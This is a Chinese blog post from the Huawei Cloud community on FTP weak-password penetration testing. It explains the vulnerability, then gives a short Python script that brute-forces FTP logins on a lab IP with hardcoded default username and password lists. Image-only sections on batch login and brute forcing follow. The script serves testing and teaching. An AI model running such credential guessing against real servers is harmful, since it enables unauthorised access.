【愚公系列】2022年03月 FTP及Telnet弱口令渗透测试之ftp扫描器

举报
愚公搬代码 发表于 2022/03/31 23:25:10 2022/03/31
【摘要】 FTP及Telnet弱口令渗透测试之ftp扫描器漏洞描述FTP 弱口令或匿名登录漏洞,一般指使用 FTP 的用户启用了匿名登录功能,或系统口令的长度太短、复杂度不够、仅包含数字、或仅包含字母等,容易被黑客攻击,发生恶意文件上传或更严重的入侵行为。漏洞危害黑客利用弱口令或匿名登录漏洞直接登录 FTP 服务,上传恶意文件,从而获取系统权限,并可能造成数据泄露。加固方案不同 FTP 服务软件可能...

FTP及Telnet弱口令渗透测试之ftp扫描器

漏洞描述

FTP 弱口令或匿名登录漏洞,一般指使用 FTP 的用户启用了匿名登录功能,或系统口令的长度太短、复杂度不够、仅包含数字、或仅包含字母等,容易被黑客攻击,发生恶意文件上传或更严重的入侵行为。

漏洞危害

黑客利用弱口令或匿名登录漏洞直接登录 FTP 服务,上传恶意文件,从而获取系统权限,并可能造成数据泄露。

加固方案

不同 FTP 服务软件可能有不同的防护程序,本修复方案以 Windows server 2008 中自带的 FTP 服务和 Linux 中的vsftpd服务为例,您可参考以下方案对您的 FTP 服务进行安全加固。

弱口令脚本

#! /usr/bin/env python
# _*_  coding:utf-8 _*_
 
import ftplib,time
username_list=['root','ftp','admin']
password_list=['root','123','ftp','oracle']
 
def ftp(ip,port=21):
    for username in username_list:
        user =username.rstrip()
        for password in password_list:   
            pwd = password.rstrip()
            try:
                ftp = ftplib.FTP()
                ftp.connect(ip,port, 10)
                ftp.login(user,pwd)
                ftp.quit()
                print '[+] FTP weak password: '+user,pwd
            except:
                print '[-] checking for '+user,pwd+' fail'
                 
                 
                 
if __name__ == '__main__':
    start_time = time.time()
 
    ftp('192.168.106.131')
    print "\n"
    print 'Checking for FTP weak password: %d 秒' % (time.time() - start_time)

一:ftp批量登录

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

二:ftp爆破

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。